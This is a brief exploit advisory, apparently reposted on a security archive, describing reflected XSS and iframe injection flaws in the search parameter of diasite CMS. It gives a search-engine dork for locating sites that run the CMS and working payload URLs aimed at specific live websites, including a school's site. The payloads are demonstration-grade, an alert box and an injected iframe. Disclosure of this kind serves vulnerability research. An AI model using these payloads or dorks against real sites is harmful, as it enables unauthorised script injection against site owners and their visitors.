Home / os / wince

Diasite CMS Reflected XSS & Iframe injection

Posted on 30 November -0001

<HTML><HEAD><TITLE>diasite CMS Reflected XSS & Iframe injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>---------------------------------------------------------------------- [Description] #Exploit title: diasite CMS Reflected XSS & Iframe injection #Exploit author: Implosion #Date: 07/10/2016 #Dorks: intext: "Powered by diasite" #Website: www.diasite.fr #Tested on: Firefox ---------------------------------------------------------------------- [Vulnerability][Reflected XSS] http://www.diateam.net/Rechercher-14-0-0-0.html?q="><script>alert('XSS')</script> ---------------------------------------------------------------------- [Vulnerability][Iframe Injection] http://www.diateam.net/Rechercher-14-0-0-0.html?q="><iframe src=https://cxsecurity.com> ---------------------------------------------------------------------- [Example] http://www.lycee-kerichen.org/Rechercher-14-0-0-0.html?q=%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E http://www.lycee-kerichen.org/Rechercher-14-0-0-0.html?q=%22%3E%3Ciframe%20src=https://cxsecurity.com%3E ---------------------------------------------------------------------- #Discovered By Implosion #Thanks to: ÐØΨΠ–ŠËRVËR ----------------------------------------------------------------------</BODY></HTML>

 

TOP